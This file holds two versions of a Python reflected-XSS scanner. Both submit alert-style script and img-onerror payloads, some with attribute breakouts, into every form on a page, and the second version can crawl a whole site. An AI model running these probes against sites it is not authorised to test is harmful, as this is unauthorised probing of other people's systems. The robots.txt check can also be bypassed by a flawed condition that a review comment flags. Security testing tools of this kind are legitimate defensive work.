import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
    """Download ``url`` and return every ``<form>`` element found in its HTML.

    Args:
        url (str): address of the page to fetch.

    Returns:
        The result of ``soup.find_all("form")`` for the parsed page.

    Raises:
        requests.exceptions.RequestException: propagated unchanged when the
            page cannot be fetched (this version does not catch it).
    """
    soup = bs(requests.get(url).content, "html.parser")
    return soup.find_all("form")
def get_form_details(form):
    """Extract the submission-relevant attributes of a parsed HTML ``form``.

    Args:
        form: a parsed form tag exposing an ``attrs`` mapping and a
            ``find_all(name)`` method.

    Returns:
        dict: ``{"action": str, "method": str, "inputs": list}`` where each
        entry of ``inputs`` is ``{"type": str, "name": str | None}``.
    """
    # The action is kept in its original case: URL paths and query strings
    # are case-sensitive, so lower-casing it can target the wrong endpoint.
    action = form.attrs.get("action", "")
    # HTTP method names and input types are case-insensitive in HTML, so
    # they are normalized for the comparisons made when submitting.
    method = form.attrs.get("method", "get").lower()
    inputs = [
        {
            "type": input_tag.attrs.get("type", "text").lower(),
            "name": input_tag.attrs.get("name"),
        }
        for input_tag in form.find_all("input")
    ]
    return {"action": action, "method": method, "inputs": inputs}
def submit_form(form_details, url, value):
    """Submit the form described by ``form_details`` with ``value`` injected.

    Args:
        form_details (dict): form description with the keys ``"action"``,
            ``"method"`` and ``"inputs"`` (a list of per-input dicts).
        url (str): address of the page that contains the form; used to
            resolve a relative ``action``.
        value (str): text written into every ``text`` and ``search`` input.

    Returns:
        The HTTP response of the form submission.
    """
    # Resolve the action against the page URL in case it is relative.
    target_url = urljoin(url, form_details["action"])
    data = {}
    for field in form_details["inputs"]:
        if field["type"] in ("text", "search"):
            # The payload is stored on the caller's dict, so it also shows
            # up when the caller later prints ``form_details``.
            field["value"] = value
        field_name = field.get("name")
        field_value = field.get("value")
        # Only inputs that have both a name and a value are submitted.
        if field_name and field_value:
            data[field_name] = field_value
    print(f"[+] Submitting malicious payload to {target_url}")
    print(f"[+] Data: {data}")
    if form_details["method"] == "post":
        return requests.post(target_url, data=data)
    # Every other method is sent as a GET with the data in the query string.
    return requests.get(target_url, params=data)
def scan_xss(url):
    """Probe every form on ``url`` for reflected XSS and report the hits.

    Each form is submitted once with a script payload; a form counts as
    vulnerable when the payload comes back verbatim in the response body.

    Args:
        url (str): address of the page to scan.

    Returns:
        bool: True if at least one form reflected the payload, else False.
    """
    forms = get_all_forms(url)
    print(f"[+] Detected {len(forms)} forms on {url}.")
    js_script = "<Script>alert('hi')</scripT>"
    is_vulnerable = False
    for form in forms:
        form_details = get_form_details(form)
        response = submit_form(form_details, url, js_script)
        # Decode leniently so a page that is not valid UTF-8 cannot abort
        # the scan with UnicodeDecodeError.
        content = response.content.decode(errors="replace")
        if js_script in content:
            print(f"[+] XSS Detected on {url}")
            print("[*] Form details:")
            # NOTE(review): the dump after the header was missing from the
            # source; pprint is imported at file level for this purpose.
            pprint(form_details)
            is_vulnerable = True
            # No break: the remaining forms are still checked and reported.
    return is_vulnerable
if __name__ == "__main__":
    import sys

    # Fail with a usage hint instead of an IndexError when no URL is given.
    if len(sys.argv) < 2:
        sys.exit(f"Usage: {sys.argv[0]} <url>")
    url = sys.argv[1]
    # NOTE(review): the statement that consumed `url` was missing from the
    # source; running the scan defined above is the assumed intent - confirm.
    print(scan_xss(url))
import requests # Importing requests library for making HTTP requests
from pprint import pprint # Importing pprint for pretty-printing data structures
from bs4 import BeautifulSoup as bs # Importing BeautifulSoup for HTML parsing
from urllib.parse import urljoin, urlparse # Importing utilities for URL manipulation
from urllib.robotparser import RobotFileParser # Importing RobotFileParser for parsing robots.txt files
from colorama import Fore, Style # Importing colorama for colored terminal output
import argparse # Importing argparse for command-line argument parsing
# XSS payloads submitted to each form. The second and third variants start
# with `">` and `'>` so they can break out of a double- or single-quoted
# HTML attribute before injecting the tag.
XSS_PAYLOADS = [
    '<img src=x onerror=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '\'><img src=x onerror=alert(1)>',
]

# Module-level set that stores every link crawled so far.
crawled_links = set()
def print_crawled_links():
    """Print every link stored in the module-level ``crawled_links`` set.

    The set is unordered, so the links are listed in arbitrary order.
    """
    print("\n[+] Links crawled:")
    for link in crawled_links:
        print(f" {link}")
# Function to get all forms from a given URL
def get_all_forms(url):
    """Download ``url`` and return every ``<form>`` element found in its HTML.

    Args:
        url (str): address of the page to fetch.

    Returns:
        The result of ``soup.find_all("form")``, or an empty list when the
        page could not be fetched (the error is printed, not raised).
    """
    try:
        soup = bs(requests.get(url).content, "html.parser")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error retrieving forms from {url}: {e}")
        return []
    return soup.find_all("form")
# Function to extract details of a form
def get_form_details(form):
    """Extract the submission-relevant attributes of a parsed HTML ``form``.

    Args:
        form: a parsed form tag exposing an ``attrs`` mapping and a
            ``find_all(name)`` method.

    Returns:
        dict: ``{"action": str, "method": str, "inputs": list}`` where each
        entry of ``inputs`` is ``{"type": str, "name": str | None}``.
    """
    # The action is kept in its original case: URL paths and query strings
    # are case-sensitive, so lower-casing it can target the wrong endpoint.
    action = form.attrs.get("action", "")
    # HTTP method names and input types are case-insensitive in HTML, so
    # they are normalized for the comparisons made when submitting.
    method = form.attrs.get("method", "get").lower()
    inputs = [
        {
            "type": input_tag.attrs.get("type", "text").lower(),
            "name": input_tag.attrs.get("name"),
        }
        for input_tag in form.find_all("input")
    ]
    return {"action": action, "method": method, "inputs": inputs}
# Function to submit a form with a specific value
def submit_form(form_details, url, value):
    """Submit the form described by ``form_details`` with ``value`` injected.

    Args:
        form_details (dict): form description with the keys ``"action"``,
            ``"method"`` and ``"inputs"`` (a list of per-input dicts).
        url (str): address of the page that contains the form; used to
            resolve a relative ``action``.
        value (str): text written into every ``text`` and ``search`` input.

    Returns:
        The HTTP response of the submission, or None when the request
        failed (the error is printed, not raised).
    """
    # Resolve the action against the page URL in case it is relative.
    target_url = urljoin(url, form_details["action"])
    data = {}
    for field in form_details["inputs"]:
        if field["type"] in ("text", "search"):
            # The payload is stored on the caller's dict, so it also shows
            # up when the caller later prints or saves ``form_details``.
            field["value"] = value
        field_name = field.get("name")
        field_value = field.get("value")
        # Only inputs that have both a name and a value are submitted.
        if field_name and field_value:
            data[field_name] = field_value
    try:
        if form_details["method"] == "post":
            return requests.post(target_url, data=data)
        # Every other method is sent as a GET with the data as query string.
        return requests.get(target_url, params=data)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error submitting form to {target_url}: {e}")
        return None
def get_all_links(url):
    """Download ``url`` and return the absolute target of every link on it.

    Args:
        url (str): address of the page to fetch; also the base against
            which relative ``href`` values are resolved.

    Returns:
        list[str]: one absolute URL per ``<a>`` element that has an ``href``
        attribute, or an empty list when the page could not be fetched
        (the error is printed, not raised).
    """
    try:
        soup = bs(requests.get(url).content, "html.parser")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error retrieving links from {url}: {e}")
        return []
    # Anchors without an href are skipped: joining a missing href would
    # just yield the page's own URL as a bogus "link".
    return [urljoin(url, anchor["href"]) for anchor in soup.find_all("a", href=True)]
def _is_crawl_allowed(domain, url):
    """Return whether the robots.txt of ``domain`` permits fetching ``url``."""
    robot_parser = RobotFileParser()
    robot_parser.set_url(urljoin(domain, "/robots.txt"))
    try:
        robot_parser.read()
    except Exception as e:
        # An unreadable robots.txt is treated as "not allowed".
        print(f"[-] Error reading robots.txt file for {domain}: {e}")
        return False
    return robot_parser.can_fetch("*", url)


def _report_vulnerable_form(args, url, form_details, payload):
    """Print one XSS finding and append it to ``args.output`` when set."""
    print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {url}{Style.RESET_ALL}")
    print("[*] Form Details:")
    # NOTE(review): the dump after the header was missing from the source;
    # pprint is imported at file level for this purpose.
    pprint(form_details)
    print(f"{Fore.YELLOW}[*] Payload: {payload} {Style.RESET_ALL}")
    if args.output:
        with open(args.output, "a", encoding="utf-8") as f:
            f.write(f"URL: {url}\n")
            f.write(f"Form Details: {form_details}\n")
            f.write(f"Payload: {payload}\n")
            f.write("-" * 50 + "\n\n")


# Function to scan for XSS vulnerabilities
def scan_xss(args, scanned_urls=None):
    """Scan the forms on ``args.url`` for reflected XSS, optionally crawling.

    Every form is submitted with each entry of ``XSS_PAYLOADS`` until one
    comes back verbatim in the response body. With ``args.crawl`` set, links
    on the same scheme and host are scanned recursively.

    Args:
        args: parsed command-line options; reads ``url``, ``obey_robots``,
            ``output``, ``crawl`` and ``max_links``.
        scanned_urls (set | None): URLs already visited, shared across the
            recursive calls; a fresh set is created when omitted.

    Returns:
        None if ``args.url`` was already scanned; otherwise True when a form
        on this page or on a crawled page reflected a payload, else False.

    Raises:
        SystemExit: when ``args.max_links`` is set and that many links have
            been crawled.
    """
    if scanned_urls is None:
        scanned_urls = set()
    url = args.url
    if url in scanned_urls:
        return None
    scanned_urls.add(url)

    forms = get_all_forms(url)
    print(f"\n[+] Detected {len(forms)} forms on {url}")
    parsed_url = urlparse(url)
    domain = f"{parsed_url.scheme}://{parsed_url.netloc}"
    crawl_allowed = _is_crawl_allowed(domain, url) if args.obey_robots else True

    is_vulnerable = False
    # NOTE(review): `or parsed_url.path` lets any URL with a non-empty path
    # be scanned even when robots.txt disallows it - confirm this is intended.
    if crawl_allowed or parsed_url.path:
        for form in forms:
            form_details = get_form_details(form)
            form_vulnerable = False
            for payload in XSS_PAYLOADS:
                response = submit_form(form_details, url, payload)
                # Compare against None explicitly: a requests Response is
                # falsy for 4xx/5xx statuses, and an error page that
                # reflects the payload is still a finding.
                if response is None:
                    continue
                if payload in response.content.decode(errors="replace"):
                    _report_vulnerable_form(args, url, form_details, payload)
                    form_vulnerable = True
                    break  # No need to try other payloads for this form
            if form_vulnerable:
                is_vulnerable = True
            else:
                print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {url}{Style.RESET_ALL}")

    if args.crawl:
        print(f"\n[+] Crawling links from {url}")
        try:
            links = get_all_links(url)
        except requests.exceptions.RequestException as e:
            print(f"[-] Error crawling links from {url}: {e}")
            links = []
        for link in set(links):  # Removing duplicates
            parsed_link = urlparse(link)
            # Compare scheme and host exactly: a plain prefix test would
            # also accept look-alike hosts such as "<host>.evil.example".
            if (parsed_link.scheme, parsed_link.netloc) != (parsed_url.scheme, parsed_url.netloc):
                continue
            if args.max_links and len(crawled_links) >= args.max_links:
                print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}")
                # NOTE(review): the statements after this message were
                # missing from the source; listing the links and exiting is
                # the assumed intent - confirm.
                print_crawled_links()
                raise SystemExit(0)
            crawled_links.add(link)
            # The recursive call reads its target from args.url; restore it
            # afterwards so the caller's namespace is left unchanged.
            args.url = link
            try:
                if scan_xss(args, scanned_urls):
                    is_vulnerable = True
            finally:
                args.url = url
    return is_vulnerable
if __name__ == "__main__":
    # Command-line entry point: parse the options and start the scan.
    parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
    parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
    parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
    # 0 disables the limit on the number of visited links
    parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit. Default 0, which means no limit.")
    parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
    parser.add_argument("-o", "--output", help="Output file to save the results")
    args = parser.parse_args()
    scan_xss(args)  # Initiating XSS vulnerability scan